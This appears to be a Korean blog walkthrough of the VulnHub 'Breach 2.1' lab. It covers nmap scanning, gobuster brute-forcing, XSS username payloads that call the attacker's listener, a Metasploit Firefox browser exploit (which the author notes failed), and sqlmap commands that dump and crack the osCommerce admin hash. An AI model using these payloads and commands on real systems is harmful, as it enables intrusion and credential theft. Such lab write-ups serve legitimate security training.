https://www.vulnhub.com/entry/breach-21,159/
이번 실습 VM 또한 192.168.110.151로 IP가 고정되어있다고 합니다
Reconnaissance
IP discovery
└─$ sudo nmap -sn 192.168.110.0/24
Nmap scan report for 192.168.110.151
Host is up (0.00018s latency).
MAC Address: 00:0C:29:FB:15:58 (VMware)
#pasing
└─$ cat ./recon/tcpAll.nmap | grep -i '/tcp' | awk '{ print $1 }' | grep -i '/' | cut -d '/' -f 1 | paste -s -d ','
111,51891,65535
└─$ sudo nmap -p 111,51891,65535 -Pn -n --open -sV -sC -iL scope.txt -oA ./recon/tcpDetailed
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 02:54 EDT
Nmap scan report for 192.168.110.151
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 41558/tcp6 status
| 100024 1 44049/udp status
| 100024 1 51891/tcp status
|_ 100024 1 55652/udp6 status
51891/tcp open status 1 (RPC #100024)
65535/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d:26 (DSA)
| 2048 9a:a8:db:78:4b:44:4f:fb:e5:83:6b:67:e3:ac:fb:f5 (RSA)
| 256 c1:63:f1:dc:8f:24:81:82:35:fa:88:1a:b8:73:40:24 (ECDSA)
|_ 256 3b:4d:56:37:5e:c3:45:75:15:cd:85:00:4f:8b:a8:5e (ED25519)
MAC Address: 00:0C:29:FB:15:58 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.13 seconds
얻은 정보
Peter:inthesource
바로 종료되어버렸는데요, 포트스캐닝을 다시 돌려보겠습니다
└─$ sudo nmap -p- -iL scope.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 03:08 EDT
Nmap scan report for 192.168.110.151
Host is up (0.0023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
51891/tcp open unknown
65535/tcp open unknown
MAC Address: 00:0C:29:FB:15:58 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds
비밀번호가 입력되면서 80번 포트가 트리거 되는가봅니다
한번 접속해서 정보 수집을 계속 진행해보겠습니다
HTTP
페이지 소스, robots.txt 는 별다른 특이사항 없습니다
gobuster를 이용해 디렉터리 브루트포싱을 진행해보겠습니다
Vulnerability
/blog 경로를 추가해 한번더 디렉터리 브루트포싱을 진행해봅니다
/smilies에서는 별다른 특이사항 없었음
tinymce 라는 폴더가 있습니다
아까 웹 사이트에서 봤을때는 활용할 만한 특이점이 없었던 것같고,
blogphp에 대한 취약점을 검색합니다
Exploitation
XSS와 SQL Injection이 가능한 취약점이 있습니다 CVE-2008-6745 코드도 있군요
XSS를 이용해 대상 호스트의 쉘을 우선 획득해보겠습니다
register.html에서 회원가입하는 username을 <img src="http://192.168.110.129:2222"> 로 해줍니다
그전에 nc를 이용한 리스닝 먼저해야겠죠?
└─$ nc -lvp 2222
이렇게 request를 받을 수 있습니다 웹 사이트는
계속 대기중입니다 테스트를 했으니
이제 metasploit을 이용해서 대상 호스트의 쉘을 획득해보겠습니다
이번엔 <iframe src="http://192.168.110.129:2345"></iframe> 을 이용해서 유저를 생성합니다
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set srvhost 192.168.110.129
srvhost => 192.168.110.129
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set srvport 1234
srvport => 1234
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set uripath /
uripath => /
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set lport 3333
lport => 3333
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > exploit
이 과정을 설명드리자면,
1. nc로 대상호스트의 XSS 취약점을 이용해 공격자 PC 에서 리스닝한다
2. 공격자 PC에서 리스닝되어있는 nc을 이용해 대상호스트에 대한 쉘을 획득한다.
정도가 되겠습니다
근데,, 에러가 발생해서 이정도 기법을 이해하는 정도로 하고 마무리하겠습니다..
다음에 다시 도전해보겠습니다
SQL injection이 가능하다고 해서 아래 코드와 같이 sqlmap을 이용해서 admin 계정에 대한 해시화된 비밀번호 획득 그리고 MD5 복호화를 통해 admin 획득 완료 했습니다
sqlmap -r search.txt -dbs --batch
sqlmap -r search.txt -dbs -D oscommerce --tables --batch
sqlmap -r search.txt -dbs -D oscommerce -T osc_administrators --dump --batch
available databases [5]:
[*] blog
[*] information_schema
[*] mysql
[*] oscommerce
[*] performance_schema
Database: oscommerce
Table: osc_administrators
[1 entry]
+----+-----------+-------------------------------------+
| id | user_name | user_password |
+----+-----------+-------------------------------------+
| 1 | admin | 685cef95aa31989f2edae5e055ffd2c9:32 |
+----+-----------+-------------------------------------+
# admin credentials
admin:32admin
'Vulnhub' 카테고리의 다른 글
[Vulnhub] Bob Walkthrough (0) | 2024.07.25 |
---|---|
[Vulnhub] NullByte Walkthrough (3) | 2024.07.24 |
[Vulnhub] Brearch Walkthrough (6) | 2024.07.22 |
[Vulnhub] Tommy Boy Walkthrough (4) | 2024.07.17 |
[Vulnhub] RickdiculouslyEasy Walkthrough (1) | 2024.07.16 |